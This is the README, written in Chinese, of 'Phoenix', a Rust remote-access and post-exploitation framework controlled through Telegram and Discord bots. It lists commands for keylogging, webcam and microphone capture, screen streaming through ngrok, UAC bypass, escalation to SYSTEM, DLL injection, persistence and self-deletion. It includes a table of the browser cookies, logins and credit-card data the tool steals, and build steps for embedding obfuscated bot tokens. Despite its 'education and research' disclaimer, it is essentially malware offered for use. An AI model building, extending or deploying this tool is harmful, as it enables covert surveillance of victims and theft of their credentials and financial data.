Phoenix 是一个基于异步的后渗透框架,它利用受信任的站点进行 C2 通信。
Phoenix 目前通过以下平台的 Bot API 提供支持:
Phoenix 提供以下基本功能:
Command Description
------- -----------
/hello 检查机器人是否在主机上活跃
/help 打印帮助信息
/persist 重启后维持访问权限(需要 UAC 绕过)
/sleep 休眠。用法:/sleep (秒数)
/reboot 重启主机
/shutdown 关闭主机
/exit 结束会话
/self_del 自删除可执行文件
/pwd 打印当前工作目录
/dir 列出当前目录内容
/cd 切换目录。用法:/cd (路径)
/search 搜索文件。用法:/search (路径) (文件)
/upload 上传文件。用法:/upload (文件), /upload *.jpg
/uid 获取用户 ID
/users 列出可用用户
/privs 列出权限
/sysinfo 打印系统信息
/location 获取地理位置信息
/hw 列出已安装硬件
/sw 列出已安装软件
/drv 列出连接的驱动器
/net 列出网络适配器
/pid 显示当前进程 ID
/ps 列出正在运行的进程
/pkill 按进程 ID 终止进程
/exec 执行命令
/chat 显示自定义消息
/webcam_list 列出可用摄像头
/webcam_snap 拍摄摄像头快照:用法:/webcam_snap (索引)
/recaudio 录音。用法:/recaudio (秒数)
/screenshot 截取屏幕截图
/keylog 开始键盘记录
/keylog_stop 停止键盘记录线程
/browser_dump 转储浏览器数据
/clipboard 转储剪贴板数据
/stream_desktop 实时流式传输主机桌面
/stream_webcam 实时流式传输主机摄像头
/stream_stop 停止实时流式传输线程 *** 需要完善
/get_system 将权限提升至 SYSTEM
/bypass_uac 绕过 UAC 提示
/inject 注入目标进程。用法:/inject (dll_path)
[!NOTE]
Phoenix 支持窃取以下浏览器的数据:
Chrome、Edge、Brave和firefox。
- 目前不支持 Firefox 密码解密!
- Chromium 转储模块基于开源项目:https://github.com/Maldev-Academy/DumpBrowserSecrets/tree/main/DllExtractChromiumSecrets。
下表展示了每个受支持浏览器所窃取的数据列表:
Phoenix 当前实现了简单的 XOR 混淆,这意味着令牌仍会硬编码在二进制文件中。混淆仅作为基本的防御措施,防止随意的字符串检查,而非阻止熟练的逆向工程师。
Ngrok 对于隧道化实时流式传输流量至关重要,没有适当的 ngrok 令牌,Phoenix 无法流式传输主机桌面/摄像头。
/src/tunnel.rs 中,将变量 token 替换为你实际的令牌:let token = obfuscate!("YOUR_NGROK_TOKEN");
/src/telegram.rs 中,将变量 bot_token 和 id 替换为你实际的机器人令牌和聊天 ID:let bot_token = obfuscate!("YOUR_TELEGRAM_TOKEN");
let id: i64 = 123456789;
> cargo build --release --bin telegram
/src/discord.rs 中,将变量 token 替换为你实际的机器人令牌:let token = obfuscate!("YOUR_DISCORD_TOKEN");
> cargo build --release --bin discord
[!IMPORTANT] 生成的二进制文件需要管理员权限才能正常运行。
screenshot
[!CAUTION] 本项目仅供教育和研究目的使用。您有责任确保在使用本工具之前获得适当的授权。作者对滥用行为不承担任何责任。
欢迎贡献和建议!如果您有“道德”的商业咨询或希望合作,请通过以下邮箱联系:[email protected]
| Chrome/Edge/Brave | Firefox |
|---|
| 历史记录 | ✅ | ✅ |
| Cookie | ✅ | ✅ |
| 自动填充数据 | ✅ | ✅ |
| 信用卡信息 | ✅ | ✅ |
| Cookie | ✅ | ✅ |
| 登录信息 | ✅ | ❌ |